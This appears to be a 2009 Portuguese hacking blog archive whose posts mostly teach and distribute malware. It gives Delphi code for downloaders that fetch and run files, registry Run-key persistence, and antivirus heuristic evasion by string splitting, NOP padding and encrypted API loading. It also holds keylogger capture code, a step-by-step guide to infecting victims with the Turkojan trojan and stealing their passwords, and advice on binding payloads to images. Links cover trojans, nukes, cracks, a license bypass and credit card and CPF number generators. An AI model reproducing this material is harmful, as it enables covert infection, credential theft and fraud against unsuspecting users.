segunda-feira, 31 de agosto de 2009

Deixando seus Trojans Indetectáveis

Bom… á pedido de muitos… estou postando aqui um tutorial de “Bypassando a Heurística dos AVs“!
Explicarei com modos fáceis, intermediários e difíceis. A cada método, explicará, como funciona, o porquê de usar o método, como usa-lo e dará um exemplo. Tornando assim, muuuuuuuuito fácil de entender!

Lembrando… 100% by Kingcaio

Então… Let’s Code!

Como funciona a Heurística?
Um “Heuristic Scan“, funciona, scaneando certas APIs que muitos malwares usam. Por exemplo, a função UrlDownloadToFile();. Ela é usada para salvar um arquivo da internet, para seu computador. Ou seja, faz o download do arquivo para seu computador. Isso é muito usado por Downloaders.

Bypassando a Heurística – Modo Fácil
1. Alterando o “EntryPoint”

A. O que é?
O EntryPoint é um endereço, que define o endereço base de mapeamento na memória.

B. Porquê?
O porquê de alterar o entrypoit, é que muitos AVs, para serem rápidos e gastarem pouca memória, scaneiam apenas o PE Header (cabeçalho) do executável. Então, alterando ele, automaticamente alterará o PE Header também.

C. Como?
Para alterar o EntryPoint, é apenas definir {$IMAGEBASE Número} no seu código. Aonde número, é um valor que você define, e pode variar de $00010000 até $7FFFFFFF. O valor padrão é $00400000

D. Exemplo:

program HazardDownloader;

{$IMAGEBASE $0026589541}

uses
Windows, ShellApi, UrlMon;

const
URL = ‘http://www.hazardsource.com/forum/styles/Arrow/imageset/site_logo.png‘;
Arquivo = ‘C:\hazardsource.png‘;
begin
URLDownloadToFile(nil, URL, Arquivo, 0, nil);
ShellExecute(0, ‘open‘, Arquivo, nil, nil, SW_SHOWNORMAL);
end.

2. Dividindo as Strings principais

A. O que é?
Dividir as Strings principais, consiste em dividir uma String, que pode ser usada pelo AV para detectar seu arquivo.

B. Porquê?
Divindo-as, dificulta a vida dos AVs porquê quando o programa for compilado, elas não vão ficar “uma ao lado da outra”.

C. Como?
Simples! É apenas pegar a String, e literalmente separá-la em diversas.

D. Exemplo:

program HazardAutoRun;

uses
Windows;

const
Chave = ‘SOFT‘+’WARE\Mi‘+’cros‘+’oft\Wi‘+’ndows\’+’Current‘+’Vers’+’ion\Run‘;
Nome = ‘HazardAutoRun’;
var
RegKey: HKey;
Valor: String;
begin
Valor:=ParamStr(0);
RegCreateKey(HKEY_LOCAL_MACHINE, Chave, RegKey);
RegSetValueEx(RegKey, Nome, 0, REG_EXPAND_SZ, PChar(Valor), Length(Valor));
RegCloseKey(RegKey);
end.



Bypassando a Heurística – Modo Intermediário
1. Inserindo NOPs

A. O que é?
NOP, é uma instrução Assembly para a família Intel x86 CPU. Deriva de “No OPeration”, ou seja, sem operação.

B. Porquê?
Inserir NOPs, dificulta um pouco a heurística dos AVs, porquê “separa” as instruções.

C. Como?
É apenas abrir um asm e inserir o NOP nele entre, ou no começo, das funções que possam serem detectadas.

D. Exemplo:

program HazardDownloaderNOP;

uses
Windows, ShellApi, UrlMon;

const
URL = ‘http://www.hazardsource.com/forum/styles/Arrow/imageset/site_logo.png‘;
Arquivo = ‘C:\hazardsource.png‘;
begin
URLDownloadToFile(nil, URL, Arquivo, 0, nil);
asm
nop
end;
ShellExecute(0, ‘open’, Arquivo, nil, nil, SW_SHOWNORMAL);
end.



Bypassando a Heurística – Modo Difícil

1. Carregando funções com GetProcAddress(); Encriptada

A. O que é?
Carregar funções com a função GetProcAddress(); encriptada, baseia-se na idéia de carregar a função dinamicamente, e o nome da função é desencriptado em run-time.

B. Porquê?
Assim, se o AV scanear apenas o arquivo, ele não achará nada. Apenas achará se ele scanear a memória do processo. Deixando assim, um pouquinho mais difícil para os AVs.

C. Como?
É apenas carregar a função com o a função GetProcAddres();, e usar algum tipo de encriptação, para encriptar o nome da função, e na hora de chamar, desencriptar a string.

D. Exemplo:

program HazardDownloaderCrypted;

uses
Windows, ShellApi, URLMon;

type
TDownload2File=function(Caller: IUnknown; URL: PChar; FileName: PChar;
Reserved: DWORD; StatusCB: IBindStatusCallback): HResult; stdcall;

function Encriptar(Str: String): String;
const
Key=’q8b2×74h851xk’;
var
Y, Z: Integer;
B: Byte;
begin
Z:=1;
for Y:=1 to Length(Str) do
begin
B:=(Ord(Str[Y]) and $0f) xor (Ord(Key[Z]) and $0f);
B:=B xor 10;
Str[Y]:=Char((Ord(Str[Y]) and $f0)+B);
Inc(Z);
if Z>Length(Key) then Z:=1;
end;
Result:=Str;
end;

const
URL = ‘http://www.hazardsource.com/forum/styles/Arrow/imageset/site_logo.png‘;
Arquivo = ‘C:\hazardsource.png‘;
var
Download2File: TDownload2File;
begin
Download2File:=GetProcAddress(LoadLibrary(’URLMON.DLL‘), PChar(Encriptar(’^PDLmz`nmnoVnMkdmC‘)));
Download2File(nil, URL, Arquivo, 0, nil);
ShellExecute(0, ‘open‘, Arquivo, nil, nil, SW_SHOWNORMAL);
end.

Bom… é isso… espero que tenham gostado.

segunda-feira, 24 de agosto de 2009

Presvisto para amanha !!!!!

Ola pessoal,

Amanha estarei postando COMO CRIAR UM KEYLOGGER NO DELPHI.
ensinarei passo a passo.

espero que todos goste e aprenda !

"EMQUANTO ISSO PEÇO QUE VOTEM NO SITE"


Luciano Sergio - ADM

domingo, 23 de agosto de 2009

Dez dicas para iniciantes em Programação

– Todo programador tem que saber lógica de programação, não existe programador sem lógica.

– Ninguém quer te ajudar, a não ser que a pessoa que você pediu ajuda ganhe algo com isso. As pessoas já tem problemas demais para ficar resolvendo os seus.

– Você sempre será um estudante. Sempre tem algo à aprender.

– Você não é pior que ninguém, e ninguém é melhor que você. Todos nos somos inteligentes, ninguém é “burro”. Apenas algumas pessoas são mais estudadas que você.

– Você não tem que gostar de ler, mais também não pode odiar. Você pode não gostar de ler um livro com tema amoroso, ou dramático, mas um livro sobre programação ( Que é o que você estuda ) você tem que gostar. Se não gostar… porque está tentando aprender à programar?

– Qual é seu objetivo? Aprender à programar ou criar um keylogger? Ou um Trojan ? Ou um cheat para trapacear um jogo? Se quer mesmo aprender a programar dedique à aprender e não à seguir tutoriais com códigos prontos e copiar e colar sem saber o que faz.

– Se você acha que está muito difícil aprender a programar, calma, descanse depois volte aos estudos e leia novamente, tente entender. Se você acha que não consegue mesmo, tire isso da sua cabeça, em si já é uma barreira.

– Comece do começo, pra que vai tentar aprender uma coisa avançada se você não sabe nem o básico? Um bom exemplo para isso é a escola, pra que um professor vai ensinar figuras de linguagem aos alunos se eles não sabem nem ler? Tentar aprender pelo avançado de uma vez é perda de tempo.

– De início escolha uma linguagem mais simples. Antes de estudar linguagens de baixo e alto nível, eu recomendo você estudar HTML para você se familiarizar com códigos. Logo, recomendo Visual Basic, Pascal, Python, uma destas linguagens para início.

10º – Pesquise, Raciocine !! Use seu cérebro, não peça programas prontos onde você só se dá o trabalho de colocar seus créditos.

Abraços e sucesso nos estudos,
Felipe P. Coutinho.

Aprenda a como programar um trojan em Delphi

Criando um Trojan em Delphi

Trojan Horse ou Cavalo de Tróia é um programa que age como a lenda do cavalo de Tróia, entrando no computador e liberando uma porta para um possível invasão e é fácil de ser enviado,é só clicar no ID do computador e enviar para qualquer outro computador.

Download do vídeo:

Part 1

Part 2

Part 3

Programando Worm para Messenger em Visual Basic

Um Worm (verme, em português), em computação, é um programa auto-replicante, semelhante a um vírus. Entretanto um vírus infecta um programa e necessita deste programa hospedeiro para se propagar, já o Worm é um programa completo e não precisa de outro programa para se propagar.

Um worm pode ser projetado para tomar ações maliciosas após infestar um sistema, além de se auto-replicar, tais como:

•Deletar arquivos em um sistem;
•Enviar documentos por email.
O worm pode tornar o computador infectado vulnerável a outros ataques e provocar danos apenas com o tráfego de rede gerado pela sua reprodução – o Mydoom, por exemplo, causou uma lentidão generalizada na Internet no pico de seu ataque.


Programando Keylogger em Visual Basic

Keylogger (que significa registrador do teclado em inglês) é um programa de computador cuja finalidade é monitorar tudo o que é digitado. Muitas vezes esses programas são utilizados com objetivos ilícitos, através de spywares, “trojan horses”, entre outros. Alguns casos de phishing, assim como outros tipos de fraudes virtuais, se baseiam no uso de algum tipo de Keylogger, instalado no computador sem o conhecimento da vítima, que captura dados sensíveis e os envia a um cracker, que posteriormente irá utilizá-los com finalidades fraudulentas.


Parte 1

Parte 2

Programando um Joiner em Visual Basic

O que é Joiner? Joiner e um sotfware que tem a função de unir dois arquivos em somente um, por exemplo:

Você quer mandar um arquivo com um keylogger para seu amigo no messenger, portanto se mandar so o arquivo server.exe do Keylogger ele irá desconfiar, então com o Joiner você pode juntar o server.exe a uma foto.jpg e assim mandar para seu amigo a foto ira abrir normalmente, já o server.exe ira executar na máquina so que oculto nos processos assim seu amigo não ira nem saber que ele está infectado com um server de Keylogger ou Trojan.

Como detectar e retirar trojans sem precisar de Anti-Vírus e Firewalls

(Netbios), 445 (Netbios por TCP/IP) estarem abertas (o que pode significar outro risco, leia a matéria sobre o r3x e o languard), e as portas de 1000 a 4000, quando você está utilizando programas como ICQ e Internet Explorer. Para fazer esse teste, esteja desconectado para que não tenha muitas portas abertas para confundir. Vamos rodar o FPORT em modo DOS e ver suas informações:


Ahá ! Descobri o “safado”. Observe que o Fport mostrou que o programa c:\windows\system32\servercompress.exe abriu e está usando a porta 666. Esse outro svchost.exe é apenas um serviço do Windows XP, não um trojan. Muito bem: descoberto o nome do arquivo como vamos fazer para mandá-lo para o espaço? Não apagar o arquivo de cara, pois como ele está sendo executado o Windows não permitirá. Eu poderia também procurar o nome do arquivo nos processos que estão sendo executados e fechar o processo, mas o trojan continuaria sendo iniciado pois ele está no registro. Vamos executar o regedit então (iniciar / executar / digite regedit) e mandar que ele procure por servercompress.exe.



Prontinho, procuramos e apagamos todas as chaves que apareceram no resultado. Logo após reiniciamos o computador, e o trojan não estará mais na memória. Agora é só ir e apagar o arquivo servercompress.exe . E assim retiramos esse programa maldoso da máquina.

Conheça os dez programas espiões que mais atacam

Seu PC tem apresentado sintomas como lentidão exagerada, um aumento no número de janelas que se abrem com anúncios ou no aparecimento de sites não solicitados no navegador? Ele pode estar infectado com um spyware, um programa espião. Em 2004, o spyware cresceu tanto que hoje é considerado uma praga tão perigosa e indesejada quanto os vírus. De fato, está até se espalhando mais. De acordo com uma pesquisa da empresa Webroot, publicada no início deste mês, somente entre outubro e dezembro de 2004 houve um aumento de 114% nas ocorrências de trojans (cavalos de tróia), e de 230% naquelas ligadas a programas monitoradores de sistema. Os dados são baseados nos registros do serviço de rastreamento da empresa, o Spy Audit.

Tipos de spywares
Existem diversos tipos de programa espião. O adware é um programa que fica abrindo inúmeros popups com propaganda. Apesar de aparentemente inofensivo, nem sempre o único prejuízo é aguentar a chatice das janelas abrindo toda hora. Um adware pode instalar componentes que monitorem dados pessoais (incluindo idade, sexo, endereço, preferências de consumo e hábitos de navegação). Eventualmente o usuário é consultado e deve aceitar ou não a instalação do programa, mas com bastante freqüência isso não acontece, e o internauta simplesmente não sabe que está baixando um adware. Há casos em que, mesmo dizendo não, a instalação é feita.

Há também os adware cookies. Alguns cookies existem para economizar o seu tempo – como clicar numa caixinha para que o site lembre o seu user name na próxima vez em que você o acessar -, mas alguns sites depositam adware cookies, capazes de armazenar os dados pessoais do usuário e vender essa informação a outros sites. Assim, firmas de marketing podem criar um perfil de usuário baseado nessas informações pessoais e vender esse perfil para outras empresas. Lembrou do spam?

Já os monitoradores de sistema podem gravar tudo que é feito num PC, desde o que é digitado no teclado até os sites mais visitados e os programas que são utilizados, e podem enviá-los por e-mail para outra pessoa. Normalmente eles rodam em segundo plano e o usuário não os percebe.

Os trojans, ou cavalos de tróia, aparentam ser aplicações inofensivas e até úteis, mas na verdade são desenhados para codificar os dados do PC e até mesmo destruir o sistema. Alguns deles, chamados Rats (Remote Administration Tools, ou ferramentas remotas de administração) dão ao atacante o controle total do seu PC sempre que você estiver online. Esse atacante poderá, a distância, transferir arquivos, adicionar ou deletar arquivos e programas e até controlar o mouse e o teclado. Os trojans são distribuídos via e-mail, em arquivos anexados, mas também podem vir empacotados com outros programas.

A Webroot publicou uma listagem com os 10 piores spywares, os que mais apareceram durante os rastreamentos feitos pela empresa no ano passado. Conheça as principais “jóias” desta coleção – e fique atento a elas e aos seus “irmãozinhos”.

Campeões: os 10 piores

CoolWebSearch (CWS)
Ele toma conta do Internet Explorer de maneira que a página inicial e as buscas do navegador se dirigem a sites de quem controla o programa – sites pornôs, por exemplo, ou sites que vendem de programas piratas a “novidades” eletrônicas.

Gator (também conhecido como Gain)
É um programa adware que fica abrindo popups com publicidade no Internet Explorer, baseando-se nas preferências do usuário. Ele é instalado secretamente quando instalamos outras aplicações gratuitas como joguinhos ou programas de troca de arquivos.

Internet Optimizer:
Seus autores se adonam das páginas de erro do navegador (por exemplo, aquelas que aparecem quando se tenta ir a um endereço que não existe) e fazem com que elas levem o internauta a sites que eles decidem.

PurityScan
É um aplicativo que o usuário baixa do endereçoe www.purityscan.com. Ele promete apagar imagens pornográficas que se encontram no HD mas, na realidade, enche o navegador de janelas com propagandas.

n-CASE
É como o Gator, que se instala em segredo junto com outros programas e abre inúmeras janelas quando conhece os hábitos de navegação do usuário.

Transponder ou vx2
Vem embutido em determinadas aplicações gratuitas e se incrustra no Internet Explorer para monitorar os sites visitados. Além disso, ele também monitora os nomes de usuário e outros dados em formulários. Toda essa informação é usada para enviar publicidade personalizada.

ISTbar/AUpdate
É uma barra (semelhante à barra do Google e outras legítimas) que se instala no Internet Explorer. Seu objetivo é supostamente fazer buscas em sites pornográficos. Na realidade, ela seqüestra o navegador para dirigi-lo a determinadas páginas da Web.

KeenValue
É outro desses chatíssimos adwares que lançam popups com mensagens publicitárias.

Perfect Keylogger
Este programinha monitora e grava todos os sites visitados, as senhas e qualquer informação que se digite no teclado. Isso permite a quem o controle roubar informação confidencial do usuário, que pode ser usada para os mais diversos fins, inclusive criminosos.

TIBS Dialer
Este programa é um marcador telefônico automático. Ele conecta o PC, sem que o usuário perceba, a sites e serviços pornogrãficos que não são gratuitos. Pelo contrário, costumam ser bastante caros.

Fique longe deles
Estamos indicando, neste especial, links para dicas de como fazer downloads com segurança e para manter o seu Windows mais protegido destas e de outras pragas da Web. Mesmo assim repetimos aqui os conselhos mais básicos:
Como Limpar

Não precisamos reforçar a importância ter ter o seu windows sempre atualizado. Use para dar uma limpada geral o programa SPYBOT, consulte a seção download.

Uma dica importante é não instalar nada que vem quando você acessa um site qualquer. Já aconteceu isso, do nada aparece um programa para instalar? Ignore.

Tenha sempre um firewall instalado na sua máquina. Recomendo o ZoneAlarm.

Fonte de pesquisa: Site Terra.

Entendendo o funcionamento de um Keylogger

Ola,

Fiz esse tutorial para que todos entendam o código do keylogger e como ele funciona.
Vamos lá vou usar de exemplo o código mais conhecido que usa a função coloca.

Analisando a função do código:

function Coloca(txt: String): String;
begin
Form1.Memo1.Text := Form1.Memo1.Text + txt;
end;

Bem o que ela realmente faz é adicionar uma string txt no memo1.

Como usar
Adicione um memo e um timer e coloque a função em baixo de implementation.

No timer coloque:
(’Esse teste é da função’);

O que ele vai fazer é chamar a função e ela vai adicionar o que está entre os ‘ ‘ no memo.

Entendendo o código de captura:



var
keyloop, KeyResult : Integer;
begin
keyloop := 0;
repeat
KeyResult := GetAsyncKeyState(keyloop);
if KeyResult = -32767 then
begin
case keyloop of
8: Coloca(’ [BACKSPACE] ‘);
9: Coloca(’ [TAB] ‘);
12: Coloca(’ [ALT] ‘);
13: Coloca(’ [ENTER] ‘);
16: Coloca(’ [SHIFT] ‘);
17: Coloca(’ [CONTROL] ‘);
18: Coloca(’ [ALT] ‘);
20: Coloca(’ [CAPS LOCK] ‘);



O que o código vai fazer é o keyloop vai pegar a variável e atribuir um valor a ela.
Cada tecla tem o seu valor Decimal ex: Valor Decimal da Tecla Tab é 9 , ele vai converter o valor decimal e vai atribuir o nome que foi colocado entre os ‘ ‘ .

Obs: Não esqueçam de colocar o timer com intervalo 1.

No fim do Tutorial fiz um txt onde contem vários valores decimais de teclas para que vocês podem estar ai criando os seus keyloggers e o código completo de captura.

É isso pessoal espero que tenham gostado e entendido como funciona o keylogger.

By: B4silisco.

http://www.b4silisco.xpg.com.br/Decimais.txt
http://www.b4silisco.xpg.com.br/codigo-captura.txt

sábado, 22 de agosto de 2009

.:DICA:.

MUITO IMPORTANTE !!!


Pessoal qualquer programa indicado aqui por este Site,
NÃO usar scanners online.Pois ao escanear o site fica com uma copia e
em questao de dias o server fica DETECTAVEL por todos os anti-virus.
Obrigado !


Luciano Sergio - Admin

quinta-feira, 20 de agosto de 2009

Parceria

Pessoal interresado em parceria,queira enviar um e-mail para:

Lcnsk8@yahoo.com.br

Obrigado !

segunda-feira, 17 de agosto de 2009

Turkojan 4.0

:: Turkojan 4.0 Melhor Trojan de sua serie (Recomendo) Download

domingo, 16 de agosto de 2009

sexta-feira, 14 de agosto de 2009

TUTORIAL TURKOJAN

TUTORIAL TURKOJAN Aqui neste tutorial vou explicar passo a passo e muito bem detalhado como criar um
servidor e como funcionam as funções deste legítimo trojan turco, especificando as
versões 2.0 e 3.0. você pode baixar o programa no link abaixo:

site oficial: www.turkojan.com


primeiramente o que interessa é a criação de um servidor, já que todas as funções
seriam desnecessárias sem um servidor. vou exemplificar conforme a versão 3.0, já
que são praticamente iguais as versões 3.0 e 2.0.

video aula
http://youtube.com/watch?v=ckubuwj3liy&mode=related&search=
1°) criando um servidor turkojan:


> clique em “editor” e nessa tela que se abrir você deverá proceder da seguinte
maneira:

> clique em “ icon” para ar o ícone do server, ou se preferir deixe o default
mesmo.

> no campo “victim name” você deverá especificar um nome para a vítima(s) que se
infectarem com este servidor, como exemplo = vítima.

> no campo dns-ip coloque o seu endereço ip, esta é uma parte interessante do
programa, já que funciona com conexão reversa, pois ao invés do ip da vítima, faça um cadastro no site www.no-ip.com e baixe o programa no-ip, nesse campo seu ip vai ser parecido com esse "seunome.no-ip.com" esse vai ser seu ip.

> em “port number” você colocará a porta em que o servidor se conectará, de
preferência deixe a porta default mesmo.

> em “connection password” defina uma senha para posteriormente se conectar ao
servidor, podendo deixar a default também, normalmente sendo =”cigicigi”.

> no campo “bind server with a file”, se preferir disfarçar o servidor com algum arquivo, se preferir disfarçar o servidor com algum arquivo poderá fazer marcando a opção correspondente.

> no campo “fake error message” você pode colocar uma mensagem de erro falsa
como alerta após a ução do servidor, editando-a ou, sem mensagem mesmo.

> no campo “registry settings” você pode definir o nome do serviço que aparecerá em um gerenciador de processos, após a infecção do pc.

> marque a opção “pack server...” caso esteja desmarcada.

> clique em “save” e escolha o diretório para a criação do servidor e pronto.
2°) conectando-se ao servidor:


> depois que você mandar de alguma forma o servidor pra determinada pessoa e ela o utar, confira se a senha que você configurou para o servidor corresponde à que aparece no campo “pass” da interface do programa (recomendo usar a mesma senha sempre pra evitar esquecimentos) e clique no botão “active”,

> aparecerá uma pequena janelinha no canto direito inferior da tela com uma mensagem: “vítima is online now” que significa que a vítima está online e você poderá se conectar.

> na parte inferior da interface do programa você terá a lista de suas vítimas
conectadas no momento, para se conectar a uma delas, clique no ip correspondente
(normalmente mais que dois cliques para dar certo).

> verifique se a mensagem na barra de títulos identifica que você realmente se
conectou, se sim, ok.
3°) função passwords:


> a primeira opção de interação com o pc da vítima será a “passwords”, onde a “local
passwords” não sei pra que que serve (indica passwords da própria máquina).

> em “remote passwords” você obterá os passwords do pc onde o servidor
conectado está alojado, dentre outras, podendo achar as senhas do pc, do ftp,
outlook, etc... e poderá salvar estas senha em um arquivo de texto.
4°) função comunication:


> em “chat with server” você pode interagir através de textos recebidos
instantaneamente pela vítima, onde se abrirá uma pequena janela em seu pc,
podendo lhe enviar mensagens também.

> em “chat properties” apenas especifique como você irá querer que apareça o seu
nome como o da vítima nacaixa de diálogos.

> em “other properties” defina o tamanha em percentual da tela do chat.

> agora basta clicar em “start chatting with victim” para iniciar a conversa.

> em “send message” você tem a opção de enviar uma mensagem para o computador da vítima, podendo escolher um ícone para isso e podendo testar antes de enviar clicando em “test message” e enviar clicando no botão “send message”
5°) função file options


> em “file manager” você tem acesso aos arquivos do explorer do pc da vítima,
podendo acessar os objetos de inicialização, painel de controle, pasta windows, e
demais pastas de forma clara e objetiva.

>na parte inferior da tela que se abre, você terá os botões com determinadas funções específicas, como fazer download ou upload de algum arquivo, criar uma nova pasta, deletar uma pasta, utar determinado arquivo, entre outros.

> em “find file” você poderá fazer uma pesquisa no pc da vítima, especificando a
unidade e o formato do arquivo a ser encontrado, por exemplo = *.exe; *.ini; *.bat.
para isso basta clicar no botão “find file”.

quarta-feira, 12 de agosto de 2009

Keyloggers

Keyloggers

Ardamax Keylogger 3.0 + Serial


Remote KeyLogger(RKL)


Spia 2.1


Spybot Jack


ThreatFire


PC Tools Firewall Plus 3.0


Recon

HACKING (VIDEO AULA)

hacking


configurar trojan do turkojan: Assistir

virus que deleta o windows: Assistir

virus falso trava pc: Assistir

hackear orkut nao confirmado: Assistir

mudar tema do orkut: Assistir

entrar na net pelo bloco de notas: Assistir

Apostila DreamWeaver

Apostila DreamWeaver

Uma otima apostila para vc que é fâ desse famoso editor de HTML.

Deixando Kaspersky 2009 infinito

Nesse TUTO! Eu irei Ensinar como deixar o Kaspersky 2009 ativo para sempre!

1. Desabilite a Autodefesa.

Abra o Kaspersky > Vá em Configurações > Opções > Desabilite o item "Habilitar Autodefesa"



2. Clique com o botão direito do mouse sobre o ícone do Kaspersky perto do relógio e escolha Sair.

3. Vá no menu Iniciar > executar > e digite "regedit".



No endereço: HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\protected \AVP8\environment
mude o "ProductStatus" de "Release" para "Beta".






4. Inicie novamente o Kaspersky.

Vá no Iniciar > Todos os Programas > Kaspersky

5. Habilite a Autodefesa (Configurações > Opções > Habilite o item "Habilitar Autodefesa"




6. Exclua a chave atual, caso ela exista (ou se estiver na lista negra)



7. Selecione "Ativar versão beta"

8. Pronto!

Obs.: A licença Beta dura somente 30 dias.
Para usar por mais 30 dias é só refazer somente o passo número 6.

[Tutoria]12 truques para o Firefox 3




Conheça funções escondidas ou não exploradas que tornam a navegação mais completa.

O Firefox 3 foi lançado há duas semanas, o que faz com que a fase do deslumbramento pelas novidades já tenha passado e, entre os entusiastas, comece a aparecer um desejo de procurar pelas funções escondidas ou não exploradas no software.

Entre as dicas compiladas abaixo, é possível fazer com que o navegador abra seu Gmail ao encontrar um link mailto: ou encontrar uma brincadeira escondida sobre robôs, entre outros truques.

Tamanho: 5MB Download

[Download]Pacote de Ferramentas Hacker (ATUALIZADO)



Download

Descrição: Super Pacote Hacker Atualizado com 85 ferramentas de hacker. Entre elas hacker para MSN e Yahoo.
PS:NÃO VENHAM RECLAMAR DE VIRÚS!!! Os programas são H A C K E R S! É Normal o Anti-Virús detectar trojans, etc! É só pausar o anti-virús quando for usar o hacker que tá tudo certo.

Tamanho: 33.39 MB

terça-feira, 11 de agosto de 2009

PhotoShop Cs4 + Traduçao pra Português

PhotoShop Cs4 + Traduçao pra Português

1° Part:



2° Part:



3° Part:



4° Part:



5° Part:



Traduçao para Português




Espero que v6 Gostem

Corel Drawn X4 Professional

Corel Drawn X4 Professional

1º Part


2º Part


3º Part



O CorelDRAW Graphics Suite X4 veio com tudo para aprimorar o desenvolvimento de projetos gráficos. Seguindo a linha das versões anteriores, esta suíte de aplicativos gráficos permite tanto designers, quanto usuários comuns, aperfeiçoarem a produção de seus trabalhos e obterem excelentes resultados. A nova versão traz uma série de novidades e melhorias, tornando o uso do software uma verdadeira experiência.
As mudanças podem ser notadas logo de início. A interface está mais simples e mais versátil, as ferramentas receberam legendas e podem facilmente serem transformadas em caixas independentes com apenas o clicar e arrastar (drag n drop) do mouse. A suíte traz os mesmos aplicativos da versão anterior, com apenas uma novidade: o Duplexing Wizard, um assistente para impressões frente e verso.
O CORELDRAW
O aplicativo principal do pacote é um dos mais utilizados do mundo para a criação de gráficos vetoriais. Embora seja uma ferramenta profissional, sua praticidade de uso permite que iniciantes desenvolvam trabalhos de qualidade sem maiores dificuldades. Oferece uma quantidade enorme de recursos e ferramentas, dando mais liberdade e suporte durante a elaboração de projetos.
Mais liberdade com as camadas
Agora você poderá controlar e editar as camadas independentemente para cada página do seu documento. Linhas guia poderão ser adicionadas para uma página em especial ou no documento inteiro.
Aprimoramentos que não acabam mais!
A nova versão oferece suporte a uma maior quantidade de formatos, incluindo arquivos do Adobe Illustrator CS3 e do Adobe Photoshop CS3. Recebeu mais de 4 mil cliparts, uma série de fontes novas, um buscador avançado de imagens e suporte a arquivos RAW. Para completar, o PowerTrace, recurso para a vetorização de imagens, também teve melhorias.
E ainda tem muito mais

segunda-feira, 10 de agosto de 2009

Programas para Tibia

Programas para Tibia

IP Changer 8.5:

fBot NG 4.5.0 + Crack:

MageBOT 8.5 (CRACKEADO-COMPLETO):

Tibia Luz:

tibia mc:

Clientes tibia:

IP Changer 8.5

IP Changer 8.5



IP Changer é um programa necessário para jogar OTServer.
Funciona com OTServer da versão 7.1 até a 8.5 e tem sistema de Atualizações Automáticas.


IP Changer 8.5: Download

Scan do Arquivo: Download

ElfBot NG 4.5.0 + Crack

ElfBot NG 4.5.0 + Crack

Olá pessoal, novidade extra quente do Tibia Fácil pra vocês, ElfBot NG 4.5.0 + Crack!

ATENÇÃO: Leia atentamente esse tutorial, lendo LETRA POR LETRA, sem PULAR PASSOS.

Eu digo isso porque sempre aparece aquele que diz:

- Ah... eu sei tudo... isso ai é bobeira... vou pular logo para o passo 3.. porque o 2 e o 1 é pura asneira..

Asneira tem na mente de quem pensa assim.

Antes de por a mão na massa baixe os seguintes programas:


ElfBot 4.5.0: Download

Armadillo Changer Pro: Download

Trial Reseter: Download

Trial Reseter (Para evitar erro de General Extraction):

Ambos os programas possuem vírus, mas são inofensivos.

Mas se você se sente um pouco inseguro, crie um ponto de restauração do Windows.

Se, mesmo assim, você não quiser baixar, não baixe, mas também fique sem o Crack.

Eu digo e repito: os programas são inofensivos.



Agora sim, MÃO NA MASSA:





1º Abra o TIBIA, em seguida abra o ElfBot. Pelo certo, é para aparecer isso:



2º Clique em ENTER KEY



3º Irá aparecer a janela para inserir a Key. Perceba que o campo NAME está vazio, e é assim que deve estar, se tiver coisa escrita ali, USE O TRIAL RESETER!




4° Agora, com a janela da key aberta, abra o ARMADILO CHANGER PRO.
No Armadillo tem um campo em branco, digite nesse campo: 686D0A76 e clique em PATCH PROCESS



5º Feche o ARMADILO. Perceba que agora a janela pra inserir a KEY está diferente. Pois bem, nos campos NAME e KEY escreva isso:


Registration Name: jhonywalker_airton@yahoo.com.br
Registration Key: 019Z93-AH3QVQ-B2NE9Q-R8BGAH-7YZEB2-H3J7E7-90C71K-3MZ6GY-4RY6UR-1R7FGC

Clique em OK.. .



6° Pronto... ELFBOT CRACKED!

Você deve repetir isso(desde o passo 1) sempre que abrir o ElfBot!

\/
\/
\/

~~~> Deu erro General Extraction Error Location ES1? <~~~
Use o Trial Reset

Nova Key por "Aabcd" do TibiaBRBOT

MageBOT 8.5 (CRACKEADO-COMPLETO)

MageBOT 8.5 (CRACKEADO-COMPLETO)

MageBOT 8.5 (Completo) Download

Scan do Arquivo Download



É isso mesmo, MageBOT 8.5 cracked, só extrair e usar, todas as funções funcionando.

MageBOT 8.5 (Completo)Scan do Arquivo

-LEIA-
(1)Por que 4 alertas?
Por que os anti vírus que deram alertas são fracos ao utilizarem Heurística para rastrear ameaças.

(2)Como baixar?
Quando abrir a página, coloque o código, clique em Baixar Arquivo, na próxima página, espere o tempo, e clique em Download Comum.

(3)Não quer abrir?
Abra o Tibia primeiro, depois o MageBOT!

Créditos: Maicon (criador)

Tibia Luz

TIBIA LUZ:

Tibia Luz da versão 8.40 Download

Tibia Luz da versão 8.41 Download

Tibia Luz da versão 8.42 Download

Tibia Luz da versão 8.50 Download

tibia mc

TIBIA MC:

Multi Client da versão 8.40: Download

Multi Client da versão 8.41: Download

Multi Client da versão 8.42: Download

Multi Client da versão 8.50: Download

Clientes tibia

Clientes tibia:

Tibia 8.50:

Tibia 8.42:

Tibia 8.41:

Tibia 8.40:

domingo, 9 de agosto de 2009

Tutoriais

.:TUTORIAIS:.

tutorial crie seu proprio worm:

tutorial aprenda hackear com o prorat:

tutorial perfect keylogger:

Deixando o kaspersky 9 infinito

Tutorial Turkojan

Entendendo o funcinamento de um keylogger

Detectando e retirando virus e spywares sem anti-virus

.:Trojans e Joines:.

.:TROJANS E JOINERS:.


Net Angel: Sem descrição

Net bus: Netbus Versão 1.6

SubSeven: Sub Seven v2.1.0

Inbinder: Sem descrição

CIA v1.3: Sem descrição

Instituition2004: Código Fonte em Delphi Incluído

ProRat v1.9: Sem descrição

Ninja Spy Trojan FiX Sem descrição

TURKOJAN 4 Sem descrição

BIFROST Sem descrição

Trojan Dark Girl Sem descrição

Spyone 1.1 Sem descrição

.;

.:Nukes:.

.:NUKES:.


Agressor: Este é um Nuke muito bom, com várias opções para você nukar o Lammer.

Genocide: Nuke muito bom

Igmp: Ótimo nuke do Ms-Dos

Panther: Ótimo nuke

Ping: É um estilo nuke

.:Crackeadores:.

.:CRACKEADORES:.


DATE CRACK: Programa para Quebrar Tempo de Sharewares

EXCEL: Excel Password Recovery v1.0b

AZPR: Advanced Zip Password Recovery v3.54

AOFPR: Advanced Office XP Password Recovery Pro

imPass: IM Password Recovery v2.10 (Crackea ZIP,ARJ,RAR)

offpass: Office Password Recovery Key Light v6.1

apdfpr: Advanced PDF Password Recovery Pro

Hacking

HACKING

webcracker: WebCracker v4.0

brutus: Brutus AE v.20

cain: Cain v.2.5 Beta 59 (Win 2000,NT,XP)

essential: Essential NetTools 3.1

PASSKIT: Passware Kit Enterprise v6.1

Geradores Hacker

GERADORES HACKERS

CcMaster Card: Gerador de Números de Cartões de Créditos da Empresa Master Card Validos.

Cpf Gg: Gera Numero de Cpf Validos

Fraude: Gera Numero de Cpf e Cnpj.O Programa é expirado dps de um tempo

